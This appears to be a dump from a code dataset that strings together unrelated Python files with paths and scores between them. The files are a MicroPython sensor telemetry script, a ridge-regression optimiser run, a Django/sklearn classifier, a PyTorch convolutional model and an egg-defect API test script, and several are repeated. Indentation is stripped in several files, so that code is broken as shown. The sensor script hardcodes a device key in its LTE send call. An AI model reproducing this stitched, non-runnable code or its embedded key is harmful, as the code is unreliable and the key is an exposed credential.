adc0VRatio = 0.0909
# flag to go into sleep loop (Turn off for testing)
doSleep = True
try:
py = Pytrack()
acc = LIS2HH12()
print("")
# Set deep sleep parameters
py.setup_int_wake_up(True, False)
# Turn off accelerometer
acc.set_odr(0)
gc.collect()
# ******************************************************************
# Collect sensor data, append to the dataList array to be sent via LTE
# ******************************************************************
dataList = []
# Get the Lithium Ion (Li-ion) battery voltage
LIVoltage = py.read_battery_voltage()
dataList.append(("LIVoltage", LIVoltage))
print("LIVoltage", LIVoltage)
# Include GPS reading
if includeGPS:
print("Getting GPS...")
# Get GPS data from pytrack board
gps = pytrackHelper.getGPS(py, 300)
if (gps[0] is not None and gps[1] is not None):
# Create a list of key value pairs to be
# sent by LTE to hologram
dataList.append(("lat", gps[0]))
dataList.append(("lng", gps[1]))
else:
dataList.append(("lat", 0))
dataList.append(("lng", 0))
else:
dataList.append(("lat", 0))
dataList.append(("lng", 0))
# Use i2c bus 1 for additional i2c devices (Otherwise using Bus 0 messes up the deep sleep processing)
i2c = I2C(1, I2C.MASTER, pins=('P10', 'P9'), baudrate=100000)
# Include the BME280 sensor for Temperature, Presure and humidity readings
if includeBME280:
print("BME280")
bme = bme280.BME280(i2c=i2c)
t, p, h = bme.values
dataList.append(("Pressure", p))
dataList.append(("Temperature", t))
dataList.append(("Humidity", h))
else:
dataList.append(("Pressure", 0))
dataList.append(("Temperature", 0))
dataList.append(("Humidity", 0))
# Include ADS1115 sensor for house battery voltage and bilge water level switch settings
if includeADS1115:
adc = ADS1115(i2c, address=0x48)
print("adc.get_voltage(0)", adc.get_voltage(0))
dataList.append(("ADC0", adc.get_voltage(0)/adc0VRatio))
dataList.append(("ADC1", adc.get_voltage(1)))
else:
dataList.append(("ADC0", -99))
dataList.append(("ADC1", -99))
# Turn off extra i2c devices before deep sleep
i2c.deinit()
dataList.append(("GC", gc.mem_free()))
print("dataList:", dataList)
# Connect to LTE and send the list of data items and hologram device key
if sendData:
lteHelper.sendData(dataList, "lQ6Gjc$n")
if doSleep:
# Go into low power sleep
print("Deep sleep for %d seconds..." %
(DEEP_SLEEP_SECONDS))
time.sleep(1)
py.setup_sleep(DEEP_SLEEP_SECONDS)
py.go_to_sleep(gps=False)
else:
print("No sleep - ending...")
except Exception as e:
# Any exceptions we reboot
sys.print_exception(e)
print("Waiting 60 seconds to reboot...")
time.sleep(60)
print('Reboot')
machine.reset() | 0.18363 | 0.294177 |
import numpy as np
import scipy
from algorithms.accelerated_gradient_descent import \
accelerated_gradient_descent
from algorithms.accelerated_gradient_descent_adaptive_restart import \
accelerated_gradient_descent_adaptive_restart
from algorithms.accelerated_gradient_descent_adaptive_restart_line_search import \
accelerated_gradient_descent_adaptive_restart_line_search
from algorithms.accelerated_gradient_descent_line_search import \
accelerated_gradient_descent_line_search
from algorithms.conjugate_gradient import conjugate_gradient
from algorithms.gradient_descent import gradient_descent
from algorithms.gradient_descent_line_search import \
gradient_descent_line_search
from utils.plot_results import plot_results
# Parameters for synthetic data.
cfg = {}
cfg["n"] = int(1e3)
# number of features
cfg["p"] = int(1e3)
# number of dimensions
cfg["noisestd"] = 1e-6
# standard deviation of additive iid gaussian noise (0 for noiseless)
cfg["strcnvx"] = False
# false = not strongly convex
# true = strongly convex with, lambda = 0.01*norm(A'*A)
# Methods to be checked.
chk = {
"GD": True,
"AGD": True,
"AGDR": True,
"LSGD": True,
"LSAGD": True,
"LSAGDR": True,
"CG": True,
}
# Generate synthetic data.
A = np.random.random((cfg["n"], cfg["p"]))
# Generate s-sparse vector.
xtrue = np.random.randn(cfg["p"])
# Take (noisy) samples.
noise = cfg["noisestd"] * np.random.randn(cfg["n"])
b = np.dot(A, xtrue) + noise
# Strongly convex OR Convex?
if cfg["strcnvx"]:
cfg["lambda"] = 0.01 * np.linalg.norm(A)
else:
cfg["lambda"] = 0.0
# Evaluate the Lipschitz constant and strong convexity parameter.
parameter = {}
parameter["Lips"] = np.linalg.norm(np.dot(A.T, A) + cfg["lambda"] * np.eye(cfg["p"]))
parameter["strcnvx"] = cfg["lambda"]
# Set parameters and solve numerically.
print("Numerical solution process is started: \n")
fx = lambda x: (
0.5 * np.linalg.norm((np.dot(A, x) - b)) ** 2
+ 0.5 * cfg["lambda"] * np.linalg.norm(x) ** 2
)
gradf = lambda x: (np.dot(A.T, np.dot(A, x) - b) + cfg["lambda"] * x)
phi = lambda x: (np.dot(A.T, np.dot(A, x)) + cfg["lambda"] * x)
y = np.dot(A.T, b)
parameter["x0"] = np.zeros((cfg["p"]))
parameter["tolx"] = 1e-5 # You can vary tolx and maxit
parameter["maxit"] = 4e2 # to achieve the convergence.
x = {}
info = {}
if chk["GD"]:
x["GD"], info["GD"] = gradient_descent(fx, gradf, parameter, verbose=1)
if chk["AGD"]:
x["AGD"], info["AGD"] = accelerated_gradient_descent(
fx, gradf, parameter, verbose=1
)
if chk["AGDR"]:
x["AGDR"], info["AGDR"] = accelerated_gradient_descent_adaptive_restart(
fx, gradf, parameter, verbose=1
)
if chk["LSGD"]:
parameter["kappa"] = 1.0
x["LSGD"], info["LSGD"] = gradient_descent_line_search(
fx, gradf, parameter, verbose=1
)
if chk["LSAGD"]:
x["LSAGD"], info["LSAGD"] = accelerated_gradient_descent_line_search(
fx, gradf, parameter, verbose=1
)
if chk["LSAGDR"]:
x["LSAGDR"], info[
"LSAGDR"
] = accelerated_gradient_descent_adaptive_restart_line_search(
fx, gradf, parameter, verbose=1
)
if chk["CG"]:
x["CG"], info["CG"] = conjugate_gradient(fx, phi, y, parameter, verbose=1)
print("Numerical solution process is completed. \n")
# Find x^* and f^* if noisy to plot data.
fmin = 0.0
if cfg["noisestd"] != 0 and cfg["n"] >= cfg["p"]:
xmin = np.dot(
np.linalg.pinv(np.dot(A.T, A) + cfg["lambda"] * np.eye(cfg["p"])),
np.dot(A.T, b),
)
fmin = fx(xmin)
# Plot the results.
options = {"dir": "../figs", "name": "ridge-regression"}
plot_results(x, info, options, fmin=0) | src/ridge_regression.py | import numpy as np
import scipy
from algorithms.accelerated_gradient_descent import \
accelerated_gradient_descent
from algorithms.accelerated_gradient_descent_adaptive_restart import \
accelerated_gradient_descent_adaptive_restart
from algorithms.accelerated_gradient_descent_adaptive_restart_line_search import \
accelerated_gradient_descent_adaptive_restart_line_search
from algorithms.accelerated_gradient_descent_line_search import \
accelerated_gradient_descent_line_search
from algorithms.conjugate_gradient import conjugate_gradient
from algorithms.gradient_descent import gradient_descent
from algorithms.gradient_descent_line_search import \
gradient_descent_line_search
from utils.plot_results import plot_results
# Parameters for synthetic data.
cfg = {}
cfg["n"] = int(1e3)
# number of features
cfg["p"] = int(1e3)
# number of dimensions
cfg["noisestd"] = 1e-6
# standard deviation of additive iid gaussian noise (0 for noiseless)
cfg["strcnvx"] = False
# false = not strongly convex
# true = strongly convex with, lambda = 0.01*norm(A'*A)
# Methods to be checked.
chk = {
"GD": True,
"AGD": True,
"AGDR": True,
"LSGD": True,
"LSAGD": True,
"LSAGDR": True,
"CG": True,
}
# Generate synthetic data.
A = np.random.random((cfg["n"], cfg["p"]))
# Generate s-sparse vector.
xtrue = np.random.randn(cfg["p"])
# Take (noisy) samples.
noise = cfg["noisestd"] * np.random.randn(cfg["n"])
b = np.dot(A, xtrue) + noise
# Strongly convex OR Convex?
if cfg["strcnvx"]:
cfg["lambda"] = 0.01 * np.linalg.norm(A)
else:
cfg["lambda"] = 0.0
# Evaluate the Lipschitz constant and strong convexity parameter.
parameter = {}
parameter["Lips"] = np.linalg.norm(np.dot(A.T, A) + cfg["lambda"] * np.eye(cfg["p"]))
parameter["strcnvx"] = cfg["lambda"]
# Set parameters and solve numerically.
print("Numerical solution process is started: \n")
fx = lambda x: (
0.5 * np.linalg.norm((np.dot(A, x) - b)) ** 2
+ 0.5 * cfg["lambda"] * np.linalg.norm(x) ** 2
)
gradf = lambda x: (np.dot(A.T, np.dot(A, x) - b) + cfg["lambda"] * x)
phi = lambda x: (np.dot(A.T, np.dot(A, x)) + cfg["lambda"] * x)
y = np.dot(A.T, b)
parameter["x0"] = np.zeros((cfg["p"]))
parameter["tolx"] = 1e-5 # You can vary tolx and maxit
parameter["maxit"] = 4e2 # to achieve the convergence.
x = {}
info = {}
if chk["GD"]:
x["GD"], info["GD"] = gradient_descent(fx, gradf, parameter, verbose=1)
if chk["AGD"]:
x["AGD"], info["AGD"] = accelerated_gradient_descent(
fx, gradf, parameter, verbose=1
)
if chk["AGDR"]:
x["AGDR"], info["AGDR"] = accelerated_gradient_descent_adaptive_restart(
fx, gradf, parameter, verbose=1
)
if chk["LSGD"]:
parameter["kappa"] = 1.0
x["LSGD"], info["LSGD"] = gradient_descent_line_search(
fx, gradf, parameter, verbose=1
)
if chk["LSAGD"]:
x["LSAGD"], info["LSAGD"] = accelerated_gradient_descent_line_search(
fx, gradf, parameter, verbose=1
)
if chk["LSAGDR"]:
x["LSAGDR"], info[
"LSAGDR"
] = accelerated_gradient_descent_adaptive_restart_line_search(
fx, gradf, parameter, verbose=1
)
if chk["CG"]:
x["CG"], info["CG"] = conjugate_gradient(fx, phi, y, parameter, verbose=1)
print("Numerical solution process is completed. \n")
# Find x^* and f^* if noisy to plot data.
fmin = 0.0
if cfg["noisestd"] != 0 and cfg["n"] >= cfg["p"]:
xmin = np.dot(
np.linalg.pinv(np.dot(A.T, A) + cfg["lambda"] * np.eye(cfg["p"])),
np.dot(A.T, b),
)
fmin = fx(xmin)
# Plot the results.
options = {"dir": "../figs", "name": "ridge-regression"}
plot_results(x, info, options, fmin=0) | 0.623377 | 0.339034 |
from django.core.wsgi import get_wsgi_application
from sklearn.metrics import *
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
import os, sys
proj_path = "."
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "backend.settings")
sys.path.append(proj_path)
os.chdir(proj_path)
application = get_wsgi_application()
from backend.apps.checker.util import *
from backend.apps.checker.models import *
print("Setting up..")
cDict = loadCanonDict()
qs_Examples = ArticleExample.objects.filter(quality_class__lt=5)
print("Processing examples")
(Y_vector, examplesMatrix) = processExamples(qs_Examples, cDict)
print("ExamplesMatrix Results: ")
print(examplesMatrix.shape)
print("Y values results:")
print(Y_vector.shape)
print("Max/min of Y: ")
ymax = max(Y_vector)
ymin = min(Y_vector)
print(str(ymax) + "/" + str(ymin))
X_train, X_test, y_train, y_test = train_test_split(
examplesMatrix, Y_vector, test_size=0.2)
print("Training...")
# Uncomment the model that you wish to try out:
# model = MLPClassifier(hidden_layer_sizes=(128,64,32,16,8), max_iter=2500)
model = SVC(gamma='scale', probability = True)
# model = KNeighborsClassifier()
# model = LinearDiscriminantAnalysis()
# model = GaussianNB()
# model = DecisionTreeClassifier()
# model = LogisticRegression()
model.fit(X_train, y_train)
predictions = model.predict(X_test)
print("Max/min of predictions: ")
ymax = max(predictions)
ymin = min(predictions)
print(str(ymax) + "/" + str(ymin))
print("Max/Min of Y_test")
ymax = max(y_test)
ymin = min(y_test)
print(str(ymax) + "/" + str(ymin))
print("Max/Min of Y_train")
ymax = max(y_train)
ymin = min(y_train)
print(str(ymax) + "/" + str(ymin))
print("Statistical tests...")
print("***************")
print("Accuracy score: " + str(accuracy_score(predictions, y_test)))
print("Confusion Matrix: ")
print(confusion_matrix(predictions, y_test))
print("Classification report: ")
print(classification_report(predictions, y_test))
print("***************")
print("Regression based: ")
rSq = r2_score(y_test, predictions)
expVariance = explained_variance_score(y_test, predictions)
maxErr = max_error(y_test, predictions)
mae = mean_absolute_error(y_test, predictions)
print("R^2: " + str(rSq))
print("Explained variance: " + str(expVariance))
print("Max Error: " + str(maxErr))
print("Mean absolute Error: " + str(mae))
exit(0) | backend/apps/checker/class_learner.py | from django.core.wsgi import get_wsgi_application
from sklearn.metrics import *
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.neural_network import MLPClassifier
from sklearn.discriminant_analysis import LinearDiscriminantAnalysis
from sklearn.neighbors import KNeighborsClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.tree import DecisionTreeClassifier
from sklearn.linear_model import LogisticRegression
import os, sys
proj_path = "."
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "backend.settings")
sys.path.append(proj_path)
os.chdir(proj_path)
application = get_wsgi_application()
from backend.apps.checker.util import *
from backend.apps.checker.models import *
print("Setting up..")
cDict = loadCanonDict()
qs_Examples = ArticleExample.objects.filter(quality_class__lt=5)
print("Processing examples")
(Y_vector, examplesMatrix) = processExamples(qs_Examples, cDict)
print("ExamplesMatrix Results: ")
print(examplesMatrix.shape)
print("Y values results:")
print(Y_vector.shape)
print("Max/min of Y: ")
ymax = max(Y_vector)
ymin = min(Y_vector)
print(str(ymax) + "/" + str(ymin))
X_train, X_test, y_train, y_test = train_test_split(
examplesMatrix, Y_vector, test_size=0.2)
print("Training...")
# Uncomment the model that you wish to try out:
# model = MLPClassifier(hidden_layer_sizes=(128,64,32,16,8), max_iter=2500)
model = SVC(gamma='scale', probability = True)
# model = KNeighborsClassifier()
# model = LinearDiscriminantAnalysis()
# model = GaussianNB()
# model = DecisionTreeClassifier()
# model = LogisticRegression()
model.fit(X_train, y_train)
predictions = model.predict(X_test)
print("Max/min of predictions: ")
ymax = max(predictions)
ymin = min(predictions)
print(str(ymax) + "/" + str(ymin))
print("Max/Min of Y_test")
ymax = max(y_test)
ymin = min(y_test)
print(str(ymax) + "/" + str(ymin))
print("Max/Min of Y_train")
ymax = max(y_train)
ymin = min(y_train)
print(str(ymax) + "/" + str(ymin))
print("Statistical tests...")
print("***************")
print("Accuracy score: " + str(accuracy_score(predictions, y_test)))
print("Confusion Matrix: ")
print(confusion_matrix(predictions, y_test))
print("Classification report: ")
print(classification_report(predictions, y_test))
print("***************")
print("Regression based: ")
rSq = r2_score(y_test, predictions)
expVariance = explained_variance_score(y_test, predictions)
maxErr = max_error(y_test, predictions)
mae = mean_absolute_error(y_test, predictions)
print("R^2: " + str(rSq))
print("Explained variance: " + str(expVariance))
print("Max Error: " + str(maxErr))
print("Mean absolute Error: " + str(mae))
exit(0) | 0.408631 | 0.294843 |
import torch
import torch.nn as nn
import torch.nn.functional as F
BN_EPS = 1e-05
BN_MOMENTUM = 0.9 # too large?
class DONetMultiscaleClassificationOrientationPose(nn.Module):
def __init__(self):
super(DONetMultiscaleClassificationOrientationPose,
self).__init__()
self.activation = F.relu
self.input_depth_1_conv = nn.Conv2d(1, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_1_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.input_depth_2_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_2_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.input_depth_3_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_3_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_1_shortcut_pool = nn.AvgPool2d(kernel_size=(18, 8),
stride=(18, 8))
self.main_1_shortcut_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=0,
bias=False, padding_mode='zeros')
self.main_1_shortcut_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_1_pool = nn.MaxPool2d(kernel_size=(3, 2), stride=(3, 2))
self.main_2_conv = nn.Conv2d(24, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_2_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_3_conv = nn.Conv2d(48, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_3_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_4_conv = nn.Conv2d(48, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_4_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_5_shortcut_pool = nn.AvgPool2d(kernel_size=(6, 4),
stride=(6, 4))
self.main_5_shortcut_conv = nn.Conv2d(48, 48, kernel_size=(3, 3),
stride=(1, 1), padding=0,
bias=False, padding_mode='zeros')
self.main_5_shortcut_bn = nn.BatchNorm2d(48, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_5_pool = nn.MaxPool2d(kernel_size=(3, 2), stride=(3, 2))
self.main_6_conv = nn.Conv2d(48, 64, kernel_size=(3, 3), stride=(1, 1),
padding=0,
bias=False, padding_mode='zeros')
self.main_6_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_7_conv = nn.Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1),
padding=0,
bias=False, padding_mode='zeros')
self.main_7_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_8_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))
self.main_9_conv = nn.Conv2d(64+48+24, 64,
kernel_size=(1, 1), stride=(1, 1),
padding=0, bias=False,
padding_mode='zeros')
self.main_9_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.output_2_dropout = nn.Dropout(p=0.2)
self.output_2_dense = nn.Linear(1280, 512, bias=True)
self.output_3_dropout = nn.Dropout(p=0.5)
self.output_3_dense = nn.Linear(512, 7, bias=True)
def forward(self, x):
x = self.activation(self.input_depth_1_bn(self.input_depth_1_conv(x)))
x = self.activation(self.input_depth_2_bn(self.input_depth_2_conv(x)))
x = self.activation(self.input_depth_3_bn(self.input_depth_3_conv(x)))
# shortcut 1
shortcut_1 = self.main_1_shortcut_pool(x)
shortcut_1 = self.main_1_shortcut_conv(shortcut_1)
shortcut_1 = self.main_1_shortcut_bn(shortcut_1)
shortcut_1 = self.activation(shortcut_1)
x = self.main_1_pool(x)
x = self.activation(self.main_2_bn(self.main_2_conv(x)))
x = self.activation(self.main_3_bn(self.main_3_conv(x)))
x = self.activation(self.main_4_bn(self.main_4_conv(x)))
# shortcut 2
shortcut_2 = self.main_5_shortcut_pool(x)
shortcut_2 = self.main_5_shortcut_conv(shortcut_2)
shortcut_2 = self.main_5_shortcut_bn(shortcut_2)
shortcut_2 = self.activation(shortcut_2)
x = self.main_5_pool(x)
x = self.activation(self.main_6_bn(self.main_6_conv(x)))
x = self.activation(self.main_7_bn(self.main_7_conv(x)))
x = self.main_8_pool(x)
# concatenate shortcuts and x to fuse results
x = torch.cat([shortcut_1, shortcut_2, x], dim=1)
x = self.main_9_conv(x)
x = self.main_9_bn(x)
x = x.view(-1, 1280)
x = self.output_2_dropout(x)
x = self.output_2_dense(x)
x = self.activation(x)
x = self.output_3_dropout(x)
x = self.output_3_dense(x)
return x
def _test():
import numpy as np
from torchsummary import summary
input_shape = (1, 126, 48)
x = np.random.random((1,)+input_shape).astype('float32')
model = DONetMultiscaleClassificationOrientationPose()
# print summary
print("DONetMultiscale")
summary(model, device='cpu', input_size=input_shape)
# test model
y = model(torch.tensor(x))
assert y.detach().numpy().shape == (1, 7)
dummy_loss = torch.sum(y)
dummy_loss.backward() | src/models/donet_ms.py | import torch
import torch.nn as nn
import torch.nn.functional as F
BN_EPS = 1e-05
BN_MOMENTUM = 0.9 # too large?
class DONetMultiscaleClassificationOrientationPose(nn.Module):
def __init__(self):
super(DONetMultiscaleClassificationOrientationPose,
self).__init__()
self.activation = F.relu
self.input_depth_1_conv = nn.Conv2d(1, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_1_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.input_depth_2_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_2_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.input_depth_3_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=1,
bias=False, padding_mode='zeros')
self.input_depth_3_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_1_shortcut_pool = nn.AvgPool2d(kernel_size=(18, 8),
stride=(18, 8))
self.main_1_shortcut_conv = nn.Conv2d(24, 24, kernel_size=(3, 3),
stride=(1, 1), padding=0,
bias=False, padding_mode='zeros')
self.main_1_shortcut_bn = nn.BatchNorm2d(24, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_1_pool = nn.MaxPool2d(kernel_size=(3, 2), stride=(3, 2))
self.main_2_conv = nn.Conv2d(24, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_2_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_3_conv = nn.Conv2d(48, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_3_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_4_conv = nn.Conv2d(48, 48, kernel_size=(3, 3), stride=(1, 1),
padding=1,
bias=False, padding_mode='zeros')
self.main_4_bn = nn.BatchNorm2d(48, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_5_shortcut_pool = nn.AvgPool2d(kernel_size=(6, 4),
stride=(6, 4))
self.main_5_shortcut_conv = nn.Conv2d(48, 48, kernel_size=(3, 3),
stride=(1, 1), padding=0,
bias=False, padding_mode='zeros')
self.main_5_shortcut_bn = nn.BatchNorm2d(48, eps=BN_EPS,
momentum=BN_MOMENTUM,
affine=True,
track_running_stats=True)
self.main_5_pool = nn.MaxPool2d(kernel_size=(3, 2), stride=(3, 2))
self.main_6_conv = nn.Conv2d(48, 64, kernel_size=(3, 3), stride=(1, 1),
padding=0,
bias=False, padding_mode='zeros')
self.main_6_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_7_conv = nn.Conv2d(64, 64, kernel_size=(3, 3), stride=(1, 1),
padding=0,
bias=False, padding_mode='zeros')
self.main_7_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.main_8_pool = nn.MaxPool2d(kernel_size=(2, 2), stride=(2, 2))
self.main_9_conv = nn.Conv2d(64+48+24, 64,
kernel_size=(1, 1), stride=(1, 1),
padding=0, bias=False,
padding_mode='zeros')
self.main_9_bn = nn.BatchNorm2d(64, eps=BN_EPS, momentum=BN_MOMENTUM,
affine=True, track_running_stats=True)
self.output_2_dropout = nn.Dropout(p=0.2)
self.output_2_dense = nn.Linear(1280, 512, bias=True)
self.output_3_dropout = nn.Dropout(p=0.5)
self.output_3_dense = nn.Linear(512, 7, bias=True)
def forward(self, x):
x = self.activation(self.input_depth_1_bn(self.input_depth_1_conv(x)))
x = self.activation(self.input_depth_2_bn(self.input_depth_2_conv(x)))
x = self.activation(self.input_depth_3_bn(self.input_depth_3_conv(x)))
# shortcut 1
shortcut_1 = self.main_1_shortcut_pool(x)
shortcut_1 = self.main_1_shortcut_conv(shortcut_1)
shortcut_1 = self.main_1_shortcut_bn(shortcut_1)
shortcut_1 = self.activation(shortcut_1)
x = self.main_1_pool(x)
x = self.activation(self.main_2_bn(self.main_2_conv(x)))
x = self.activation(self.main_3_bn(self.main_3_conv(x)))
x = self.activation(self.main_4_bn(self.main_4_conv(x)))
# shortcut 2
shortcut_2 = self.main_5_shortcut_pool(x)
shortcut_2 = self.main_5_shortcut_conv(shortcut_2)
shortcut_2 = self.main_5_shortcut_bn(shortcut_2)
shortcut_2 = self.activation(shortcut_2)
x = self.main_5_pool(x)
x = self.activation(self.main_6_bn(self.main_6_conv(x)))
x = self.activation(self.main_7_bn(self.main_7_conv(x)))
x = self.main_8_pool(x)
# concatenate shortcuts and x to fuse results
x = torch.cat([shortcut_1, shortcut_2, x], dim=1)
x = self.main_9_conv(x)
x = self.main_9_bn(x)
x = x.view(-1, 1280)
x = self.output_2_dropout(x)
x = self.output_2_dense(x)
x = self.activation(x)
x = self.output_3_dropout(x)
x = self.output_3_dense(x)
return x
def _test():
import numpy as np
from torchsummary import summary
input_shape = (1, 126, 48)
x = np.random.random((1,)+input_shape).astype('float32')
model = DONetMultiscaleClassificationOrientationPose()
# print summary
print("DONetMultiscale")
summary(model, device='cpu', input_size=input_shape)
# test model
y = model(torch.tensor(x))
assert y.detach().numpy().shape == (1, 7)
dummy_loss = torch.sum(y)
dummy_loss.backward() | 0.890812 | 0.329891 |
from tkinter.tix import Tree
import requests
import os
import time
import cv2
import numpy as np
from scipy.special import softmax
from sklearn import metrics
import pandas as pd
def parse_labels(filenames):
    """Extract the ground-truth class name embedded in each test filename.

    Filenames are expected to look like ``..._(<label>)_a_b_c.jpg``: after
    dropping the 4-character extension, the 4th underscore-token from the
    end is the parenthesised label.
    """
    labels = []
    for name in filenames:
        stem = name[:-4]                 # drop ".jpg"/".png" (4-char suffix)
        tagged = stem.split('_')[-4]     # e.g. "(ok)"
        labels.append(tagged[1:-1])      # strip the surrounding parentheses
    return labels
def parse_label(filename):
    """Return the class name parsed from a single filename.

    Same convention as :func:`parse_labels`: strip the 4-character
    extension, take the 4th underscore-token from the end, and remove the
    surrounding parentheses.
    """
    stem = filename[:-4]
    tagged = stem.split('_')[-4]
    return tagged[1:-1]
def render_label(image, label, pred):
    """Overlay ground-truth and predicted labels on *image* and show it."""
    font = cv2.FONT_HERSHEY_SIMPLEX
    blue, green = (255, 0, 0), (0, 255, 0)
    image = cv2.putText(image, f'Label: {label}', (50, 100),
                        font, 1, blue, 2, cv2.LINE_AA)
    image = cv2.putText(image, f'Pred: {pred}', (50, 50),
                        font, 1, green, 2, cv2.LINE_AA)
    # Non-blocking preview window (1 ms key wait keeps the UI responsive).
    cv2.imshow('Classification Result', image)
    cv2.waitKey(1)
    return image
def save_csv_report(report, output_dir, class_names):
    """Write a sklearn classification-report dict to CSV at *output_dir*.

    Rows are the per-class entries followed by the three summary rows that
    ``classification_report(output_dict=True)`` appends.
    """
    frame = pd.DataFrame(report).transpose()
    row_names = class_names + ["accuracy", "macro avg", "weighted avg"]
    frame.insert(loc=0, column='class', value=row_names)
    frame.to_csv(output_dir, index=False, float_format='%.4f')
def save_csv_confusion_matrix(confusion_matrix, output_dir, class_names):
    """Write a confusion matrix to CSV with class names labelling both axes."""
    frame = pd.DataFrame(confusion_matrix, columns=class_names)
    # First column carries the row labels (blank header cell).
    frame.insert(loc=0, column=' ', value=class_names)
    frame.to_csv(output_dir, index=False)
# Inference-server endpoint that classifies a single uploaded photo.
api = 'http://10.8.0.94:5000/api/photos/'
# Full 7-way label mapping (index -> name), kept for reference.
class_label_to_name = {0: 'ok', 1: 'qishihuangdong', 2 : 'sipei', 3: 'kongliao', 4: 'wuqishi', 5: 'liewen', 6: 'ruopei'}
# Binary mapping: every defect class collapses to 1 (NoOK).
name_to_class_label = {'ok': 0 , 'qishihuangdong' : 1, 'sipei' : 1, 'kongliao' : 1, 'wuqishi' : 1, 'liewen' : 1, 'ruopei' : 1}
# name_to_class_label = {'ok': 0 , 'qishihuangdong' : 1, 'sipei' : 2, 'kongliao' : 3, 'wuqishi' : 4, 'liewen' : 5, 'ruopei' : 6}
test_file_path= '/Users/luvletteru/Documents/2022-02-13-Eggs-Test'
output_dir = '/Users/luvletteru/Documents/2022-02-16-Eggs-Test-Result'
result_dir = os.path.join(output_dir, 'results')
no_ok_dir = os.path.join(output_dir, 'no_ok')
bn_class_names = ['OK', 'NoOK']
os.makedirs(result_dir, exist_ok=True)
os.makedirs(no_ok_dir, exist_ok=True)
filenames = os.listdir(test_file_path)
num_samples = len(filenames)
label_names = []
labels = []
pred_label_names = []
pred_labels = []
start = time.time()
for idx, filename in enumerate(filenames):
    # Skip files whose name marks them as filtered out.
    if '--' in filename:
        print(f"Filter (unknown)")
        continue
    s = time.time()
    image_path = os.path.join(test_file_path, filename)
    image = cv2.imread(image_path)
    # Send classification request to the inference server.
    # BUG FIX: open the upload in a context manager so the file handle is
    # closed after each request instead of leaking one descriptor per image.
    with open(image_path, 'rb') as image_file:
        response = requests.post(api, files = {"file": image_file})
    # Obtain prediction result (a plain label-name string).
    pred_label_name = response.json()
    # Ground truth parsed from the filename.
    label_name = parse_label(filename)
    label = name_to_class_label[label_name]
    label_names.append(label_name)
    labels.append(label)
    pred_label_names.append(pred_label_name)
    pred_label = name_to_class_label[pred_label_name]
    pred_labels.append(pred_label)
    # Save the annotated image; misclassified ones also go to no_ok_dir.
    image = render_label(image, label_name, pred_label_name)
    cv2.imwrite(os.path.join(result_dir, filename), image)
